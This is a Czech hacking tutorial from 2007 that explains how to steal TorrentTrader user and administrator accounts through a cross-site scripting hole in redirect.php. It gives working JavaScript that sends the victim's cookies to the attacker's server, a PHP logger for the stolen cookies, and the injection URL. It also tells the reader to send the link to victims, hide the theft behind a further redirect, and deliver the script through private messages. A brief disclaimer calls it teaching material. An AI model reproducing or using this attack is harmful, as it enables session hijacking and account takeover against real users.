Kradení účtů Torrent Traderu

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: MyFlower
Datum: 15.10.2007
Hodnocení/Hlasovalo: 1/1

Chcete admin účet na TorrentTraderu? Zde je návod...

Velké množství českých i světových torrent traderů (serverů pro stahování torrentů) běží díky skriptům od "TorrentTrader" - adresa ke stažení je zde: http://sourceforge.net/projects/torrenttrader/.

Všechny novější verze (na 100% do verze 1.08, která se běžně používá) obsahují jednu obrovskou chybu v zabezpečení, kterou jsem nedávno objevil - je jí skript "redirect.php".

Nyní k popisu, co budeme dělat... Začnu zeširoka: všechny weby, které jsou privátní potřebují nějaký druh přihlášení. Toto přihlášení je ve většině případů zastoupeno uživatelským jménem a heslem, díky kterému se přeneseme do nitra webu. Mnoho serverů nabízí také možnost automatického přihlášení. Automatické přihlášení není samozřejmě řešeno pomocí sessions či IP adresy, ale pomocí cookie... Všechno výše popsané obsahuje i TorrentTrader a my toho využijeme.

Ptáte se jak? Není to nic těžkého (ty chytřejší pochopili, ty méně zdatní pokračují ve čtení).

Na svém webu (případně na localhostu) si založte nové soubory log.txt, cookie.php a script.js.

script.js: Do tohoto souboru napíšeme primitivní skript, který nás přesměruje na cookie.php (absolutní adresou!).
Obsah souboru:
document.location="http://NášServer.cz/cookie.php
?cookie="+document.cookie;

log.txt: Do tohoto souboru se nám zapíše obsah cookie, proto ho nechte prázdný a nastavte mu práva na zápis (CHMOD 777).

cookie.php: Toto bude PHP skript, který zapíše obsah cookie do souboru log.txt
Obsah souboru:
<?php $cookie = $HTTP_GET_VARS["cookie"];
$datum = Date("d.m.Y H:i:s");
@$referer = $_SERVER['HTTP_REFERER'];
$file = fopen('log.txt', 'a');
if (!@$referer) { $referer = "NEZNAMY WEB"; }
if ($cookie == "") { $cookie = "NENALEZENA ZADNA COOKIE!"; }
fwrite(
$file,
$datum."
".$referer.":

Cookie: ".$cookie . "
_____________________________________________________


"
);
?>


Právě jsme dokončili tu jednodušší část a čeká nás ta trošku těžší.

Nyní nám nezbývá, než zadat do prohlížeče tuto adresu: http://AdresaTraderu.cz/redirect.php . Měla by se nám objevit stránka, která se bude pořád kolem dokola aktualizovat (pokud se neobjeví znamená to, že buďto je přejmenovaná nebo neexistuje nebo je dostupná pouze po přihlášení - pokud neexistuje jsme v háji a nemůžeme pokračovat dál tímto způsobem).
Pokud tuto stránku vidíte vyzkoušejte zadat tuto adresu: http://AdresaTraderu.cz/redirect.php?url=<script src=http://NášServer.cz/script.js></script>

Pokud vše funguje jak má - a já věřím, že funguje - měl by se vám na serveru v souboru log.txt objevit obsah vaší přihlašovací cookie (pokud jste přihlášeni, samozřejmě).

--> V log.txt nic není!
---> Buďto nejste přihlášeni, a proto nemáte cookie nebo jste něco udělali špatně.

--> Stránka ..redirect.php hází chybovou hlášku!
---> Něco jste udělali špatně nebo je stránka proti těmto útokům již chráněna.

Pokud je vše, jak má být, stačí nám již pouze odeslat tento link oběti a vyčkat na obsah našeho souboru log.txt, ten pak zkopírovat a přepsat jím data v souboru cookies.txt vašeho prohlížeče (tento soubor naleznete např. u Firefoxu zde: %appdata%\Mozilla\Firefox\Profiles\VášProfil\cookies.txt - případně cookies-2.txt atd) a podívat se na stránku traderu. Měli by jste být přihlášeni pod uživatelským jménem vaší oběti.

Tímto způsobem můžete krást jakékoli uživatelské účty, včetně těch administrátorských. Nedozvíte se díky nim sice heslo oběti, ale získáte jeho práva, což mnohdy postačuje.

Poznámky:
a) Tento skript můžete ještě vylepšit - např naprogramovat ještě jedno přesměrování např. na seznam, aby nikdo nepoznal, že mu byly zcizeny údaje.
b) Skript má mnoho využití - ne jen na TorrentTradeeru - jeho modifikace lze použít i na další weby, které podporují přesměrování nebo jakékoli includování HTML (odkazů) do textu.
c) Tento skript je výukovým materiálem, nikoli návodem k hackování! Nepoužívejte jej jinde, než na stránkách, ke kterým máte administrátorská práva a nezneužívejte jej ke kradení uživatelských údajů! Autor článku není jakkoli zodpovědný za Vaši případnou činnost!
d) V některých verzích funguje tento skript dokonce i v PM (osobních zprávách) - stačí poslat PM a skrypt se spustí po jejím otevření!